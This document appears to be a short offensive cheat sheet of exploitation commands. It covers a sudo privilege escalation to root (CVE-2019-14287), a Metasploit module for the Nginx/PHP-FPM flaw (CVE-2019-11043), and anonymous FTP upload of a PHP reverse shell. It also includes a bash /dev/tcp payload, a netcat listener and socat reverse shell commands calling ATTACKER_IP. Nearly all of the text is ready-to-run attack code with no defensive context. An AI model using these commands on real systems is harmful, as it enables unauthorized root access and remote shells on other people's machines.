CVE-2019-14287 (Sudoers privilege escalation)
- On target launch next command to get root shell
sudo -lu#-1 /bin/bash
CVE-2019-11043 (Nginx + PHP-FPM buffer overflow)
- Use Metasploit exploit(multi/http/php_fpm_rce)
RHOST=TARGET_IP
RPORT=TARGET_PORT
TARGETURI=/target_vulnerable_file.php
CVE-1999-0527 (FTP server with world writable directories)
- Anonymous FTP Login with user "anonymous" and no password on target FTP
- On target FTP upload reversephpshell.php
- On attacker launch
- On target call reverseshell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1'");?>
nc -v -n -l -p ATTACKER_PORT
http://TARGET_IP:TARGET_PORT/reversephpshell.php
Socat Reverse Shell
On attacker
socat file:`tty`,raw,echo=0 tcp-listen:ATTACKER_PORT
On target
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:ATTACKER_PORT;